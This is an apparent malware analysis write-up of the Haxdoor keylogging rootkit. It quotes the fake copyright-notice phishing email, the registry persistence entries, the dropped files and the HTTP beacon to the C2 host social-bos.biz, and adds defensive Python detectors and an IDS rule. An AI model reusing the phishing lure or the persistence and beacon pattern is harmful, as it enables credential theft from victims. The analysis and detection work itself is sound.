A Haxdoor rootkit is being distributed by email, using a fake copyright-infringement notice as the lure.

Your internet access is going to get suspended

The Internet Service Provider Consortium was made to protect the rights of software authors and artists.
We conduct regular wiretapping on our networks to monitor criminal acts.

We are aware of your illegal activities on the internet which were originating from

You can check the report of your activities in the past 6 months that we have attached. We strongly advise you to stop your activities regarding the illegal downloading of copyrighted material or your internet access will be suspended.

Sincerely
ICS Monitoring Team
Attachment:
user-EA49943X-activities.zip
The zip file contains a file called user-EA49943X-activities.exe. Once run, Haxdoor captures all user keystrokes (including confidential details such as usernames, passwords and credit card numbers) and sends the stolen information to a remote attacker.

File details


Filename: user-EA49943X-activities.exe
Kaspersky: Trojan-Spy.Win32.Goldun.axt
Filename: cabpck.dll
Kaspersky: Trojan-Spy.Win32.Goldun.axn
Filename: krnlcab.sys
Kaspersky: Trojan-Spy.Win32.Goldun.axr

Notes


Registry changes.
  • Registers cabpck.dll as a Winlogon notification package, so winlogon.exe (which runs as LocalSystem) loads the DLL at boot and calls its Startup handler. Haxdoor hides the entire HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify key on the infected system, so these entries will not show in Regedit while the rootkit is active.
    QUOTE
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "a950"
    Type: REG_SZ
    Data: [343E1CC0963F65AD2]
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "Asynchronous"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "DllName"
    Type: REG_EXPAND_SZ
    Data: cabpck.dll
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "Impersonate"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "MaxWait"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "Startup"
    Type: REG_SZ
    Data: cabpck St
  • Adds a kernel-mode driver service called krnlcab (Type 1 = SERVICE_KERNEL_DRIVER, Start 1 = SERVICE_SYSTEM_START) with the display name "Cabinet Kernel Packer". The LEGACY_KRNLCAB entry under Enum\Root is the Plug and Play record Windows creates for a legacy (non-PnP) driver.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB "NextInstance"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "Class"
    Type: REG_SZ
    Data: LegacyDriver
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "ClassGUID"
    Type: REG_SZ
    Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "ConfigFlags"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "DeviceDesc"
    Type: REG_SZ
    Data: Cabinet Kernel Packer
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "Legacy"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "Service"
    Type: REG_SZ
    Data: krnlcab
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000\Control
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000\Control "*NewlyCreated*"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000\Control "ActiveService"
    Type: REG_SZ
    Data: krnlcab
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "DisplayName"
    Type: REG_SZ
    Data: Cabinet Kernel Packer
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "ErrorControl"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "ImagePath"
    Type: REG_EXPAND_SZ
    Data: system32\krnlcab.sys
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "Start"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "Type"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab\Enum
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab\Enum "0"
    Type: REG_SZ
    Data: Root\LEGACY_KRNLCAB\0000
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab\Enum "Count"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab\Enum "NextInstance"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab\Security
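The two persistence mechanisms above (a Winlogon Notify package and a system-start kernel driver) are easy to pick out of an offline registry listing once it is parsed. The following is an added example, not code from the original post: it parses the key / "Name" / Type: / Data: layout used above, decodes REG_DWORD bytes, and flags Notify packages outside an assumed Windows XP baseline plus any kernel driver that starts at boot or system start. The sample dump is constructed from a subset of the values listed on this page plus one stock XP Notify entry (sclgntfy) for contrast; the baseline list of known Notify DLLs is my assumption, not something the page states.

```python
"""Parse a registry dump in the key / "Name" / Type: / Data: layout used
above and flag the two persistence mechanisms this Haxdoor sample uses."""
import re

# Constructed sample: a subset of the values listed on this page, in the
# same layout, plus one stock XP Notify package (sclgntfy) for contrast.
SAMPLE_DUMP = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy "DllName"
Type: REG_EXPAND_SZ
Data: sclgntfy.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "Asynchronous"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "DllName"
Type: REG_EXPAND_SZ
Data: cabpck.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "DisplayName"
Type: REG_SZ
Data: Cabinet Kernel Packer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "ImagePath"
Type: REG_EXPAND_SZ
Data: system32\krnlcab.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "Start"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
"""

# Assumed baseline of Winlogon Notify packages shipped with Windows XP
# (assumption, not from the page); anything else registered there deserves a look.
KNOWN_NOTIFY_DLLS = {
    "crypt32chain", "cryptnet", "cscdll", "sccertprop", "schedule",
    "sclgntfy", "senslogn", "termsrv", "wlballoon",
}

SERVICE_KERNEL_DRIVER = 1   # "Type" value
SERVICE_SYSTEM_START = 1    # "Start" value (0 = boot, 1 = system, 2 = auto, 3 = demand)

NOTIFY_PREFIX = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\"
SERVICES_PREFIX = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\"

VALUE_RE = re.compile(r'^(?P<key>HKEY_[^"]+?) "(?P<name>[^"]+)"$')


def parse_dump(text):
    """Return {key: {value_name: data}} from the dump layout used above.
    REG_DWORD data such as '01, 00, 00, 00' is little-endian; decode it to an int."""
    tree = {}
    lines = [ln.strip() for ln in text.strip().splitlines()]
    i = 0
    while i < len(lines):
        m = VALUE_RE.match(lines[i])
        if (not m or i + 2 >= len(lines)
                or not lines[i + 1].startswith("Type:")
                or not lines[i + 2].startswith("Data:")):
            i += 1              # bare key line or something we do not understand
            continue
        vtype = lines[i + 1].split(":", 1)[1].strip()
        data = lines[i + 2].split(":", 1)[1].strip()
        if vtype == "REG_DWORD":
            data = int.from_bytes(bytes(int(b, 16) for b in data.split(",")), "little")
        tree.setdefault(m["key"], {})[m["name"]] = data
        i += 3
    return tree


def find_persistence(text):
    """Flag unknown Winlogon Notify packages and boot/system-start kernel drivers.
    Returns (kind, subkey name, dll or image path) tuples."""
    findings = []
    for key, values in parse_dump(text).items():
        if key.startswith(NOTIFY_PREFIX) and "DllName" in values:
            dll = values["DllName"]
            base = dll.replace("/", "\\").rsplit("\\", 1)[-1].lower().rsplit(".", 1)[0]
            if base not in KNOWN_NOTIFY_DLLS:
                findings.append(("winlogon_notify", key.rsplit("\\", 1)[1], dll))
        elif key.startswith(SERVICES_PREFIX) and "\\" not in key[len(SERVICES_PREFIX):]:
            # Only the service key itself, not its Enum/Security subkeys.
            if (values.get("Type") == SERVICE_KERNEL_DRIVER
                    and values.get("Start", 99) <= SERVICE_SYSTEM_START):
                findings.append(("kernel_driver", key.rsplit("\\", 1)[1],
                                 values.get("ImagePath", "?")))
    return findings


if __name__ == "__main__":
    for kind, name, target in find_persistence(SAMPLE_DUMP):
        print(f"{kind:16} {name:12} {target}")
```

Run on the sample it reports the cabpck Notify package and the krnlcab driver and stays silent on sclgntfy. Because the rootkit hides the Notify key from the live system, feed this a listing taken from an offline copy of the SOFTWARE and SYSTEM hives (or a dump produced while the driver is not loaded) rather than from Regedit on the running machine.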
File system changes.
  • Creates a new folder.
    QUOTE
    %Temp%\msi_setup
  • Adds the following files. Only k86.bin is visible; the other two are hidden by the rootkit.
    QUOTE
    %system%\cabpck.dll
    Date: 9/13/2008 5:10 PM
    Size: 23,159 bytes
    %system%\k86.bin
    Date: 9/13/2008 5:11 PM
    Size: 0 bytes
    %system%\krnlcab.sys
    Date: 9/13/2008 5:10 PM
    Size: 8,672 bytes
Note: %Temp% is a variable that refers to the temporary folder. By default, this is C:\Documents and Settings\[UserName]\Local Settings\Temp\ (Windows NT/2000/XP).
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).


While the rootkit is active, winlogon.exe (which now hosts cabpck.dll) listens for incoming connections and issued the following request to social-bos.biz. Note that the rootkit appends ".NET CLR 1.1.2380" to the browser's User-Agent string, which makes the beacon easy to spot on the wire.

CODE
GET /jerken/data.php?trackid=[removed] HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.2380)
Host: social-bos.biz
~~~~~~~~~~: ~~~~~~~~~~
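The request above gives three network indicators: the C2 host, the /jerken/data.php?trackid= path, and the ".NET CLR 1.1.2380" token in the User-Agent (the released .NET Framework 1.1 reports 1.1.4322, so the token is an oddity worth keying on; that comparison is my addition, the page only observes the appended string). The following added example, not code from the original post, splits a raw client-side HTTP stream into requests and checks each against those indicators; the sample traffic is constructed from the beacon shown above (trackid redacted as on the page) plus an ordinary IE6 request that must not match. The Suricata rule string is my own and assumes Suricata 5+ sticky-buffer syntax.

```python
"""Match captured HTTP requests against the Haxdoor beacon indicators above."""
import re

# Constructed sample traffic: the beacon shown on this page, then a normal
# IE6 request (real .NET 1.1 build number) that must come back clean.
SAMPLE_TRAFFIC = (
    "GET /jerken/data.php?trackid=[removed] HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.2380)\r\n"
    "Host: social-bos.biz\r\n"
    "\r\n"
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)\r\n"
    "\r\n"
)

# Indicators taken from the request shown on this page.
C2_HOSTS = {"social-bos.biz"}
C2_PATH_RE = re.compile(r"^/jerken/data\.php\?trackid=", re.IGNORECASE)
UA_TOKEN = ".NET CLR 1.1.2380"

# Equivalent IDS signature for the User-Agent token (assumed Suricata 5+ syntax).
SURICATA_RULE = (
    'alert http $HOME_NET any -> $EXTERNAL_NET any '
    '(msg:"Haxdoor/Goldun beacon User-Agent"; flow:established,to_server; '
    'http.user_agent; content:".NET CLR 1.1.2380"; '
    'classtype:trojan-activity; sid:1000001; rev:1;)'
)


def split_requests(raw):
    """Yield (method, target, headers) for each request in a raw client stream.
    Header names are lower-cased so lookups are case-insensitive."""
    for chunk in raw.split("\r\n\r\n"):
        lines = chunk.split("\r\n")
        if not lines or " HTTP/" not in lines[0]:
            continue                      # trailing empty chunk or not a request line
        method, target, _version = lines[0].split(" ", 2)
        headers = {}
        for line in lines[1:]:
            if ":" in line:
                name, value = line.split(":", 1)
                headers[name.strip().lower()] = value.strip()
        yield method, target, headers


def match_beacon(raw):
    """Return one list of hit reasons per request; an empty list means clean."""
    results = []
    for _method, target, headers in split_requests(raw):
        hits = []
        if headers.get("host", "").lower() in C2_HOSTS:
            hits.append("host")
        if C2_PATH_RE.match(target):
            hits.append("path")
        if UA_TOKEN in headers.get("user-agent", ""):
            hits.append("user-agent")
        results.append(hits)
    return results


if __name__ == "__main__":
    for n, hits in enumerate(match_beacon(SAMPLE_TRAFFIC), 1):
        print(f"request {n}: {'HIT ' + ','.join(hits) if hits else 'clean'}")
```

The host and path checks catch this particular sample; the User-Agent check is the more durable one, because the implant stamps the token onto every request it sends regardless of which domain it is talking to at the time.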